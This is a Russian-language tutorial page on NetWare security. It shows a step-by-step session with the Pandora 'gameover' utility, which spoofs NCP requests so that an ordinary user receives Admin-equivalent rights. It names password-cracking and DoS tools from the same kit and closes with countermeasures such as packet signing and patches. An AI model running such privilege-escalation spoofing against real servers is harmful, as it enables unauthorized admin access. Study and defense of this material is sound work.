Иллюстрированный самоучитель по Secure Web


Ложные атаки (PANDORA) - часть 2




Рис. 7.7. Теперь взломщик может приступить к своему "черному делу"

Запустите утилиту gameover следующим образом.

Gameover<cr>

Server internal net (4 bytes hex)

36FCC65D<cr>

Server address (6 bytes hex)

000000000001<cr>

File server connection number (irit)

most probably '!' (seen as: '*<server_name>.<server.context>')

4<cr>

Server socket high (1 byte hex)

most probably '40' 40<cr>

Server socket low (1 byte hex)

Most probably '07' 39<cr>

User name to gain rights
(does NOT have to be currently connected)

eculp<cr>

User name to get rights from
(does not have to be currently connected)

Admin<cr>

Spoofing: Done.

После этого можно зарегистрироваться в качестве пользователя ECULP и получить права администратора. Здорово, не правда ли?

В пакете Pandora содержится и много других утилит, заслуживающих внимания. Две другие утилиты, levell-1 и level3-1. также предназначены для передачи ложных NCP-запросов, как и gameover. Их использование также приводит к обработке запроса SET EQUIVALENT, однако при этом объекты-пользователи могут располагаться в различных контекстах. Такую возможность в лабораторных условиях нам проверить не удалось.

Утилиты extract, crypto и crypto2 предназначены для взлома паролей NDS и будут рассмотрены ниже в данной главе. Утилита havoc является прекрасным инструментом для выполнения атаки DoS.

Контрмеры: защита от утилит Pandora


Для защиты от утилит из пакета Pandora существует много различных способов, и их перечень во многом зависит от архитектуры узла NetWare. Вообще, для предотвращения хакинга с применением описанных средств нужно следовать следующим рекомендациям:

  •  Никогда не помещайте пользователя Admin (или эквивалентного) в тот же контейнер, в котором содержатся другие пользователи.
  •  Установите самый новый пакет обновления Support Pack 6 (IWSP6.EXE), который можно найти по адресу ftp://ftp.novell.com/pub/updates/nw/ nw411/iwsp ехе. При этом файл DS.NLM будет замещен его новой версией. Ее можно свободно получить по адресу http://www.support.novell.com.
  •  Перед запуском файла DS.NLM добавьте команду SET PACKET SIGNATURE OPTION=3 либо в конец файла autoexec.ncf, либо в начало файла startup.ncf.
  •  В сценарии autoexec, ncf можно также вызвать сценарий SYS:SYSTEMXsecure, ncf. При этом для того же и нескольких других параметров будут установлены требуемые значения, однако снова убедитесь в том, что сценарий вызывается в начале файла autoexec.ncf. Откройте файл secure.ncf и удалите символы комментария В строке SET PACKET SIGNATURE OPTION=3.






Начало  Назад  Вперед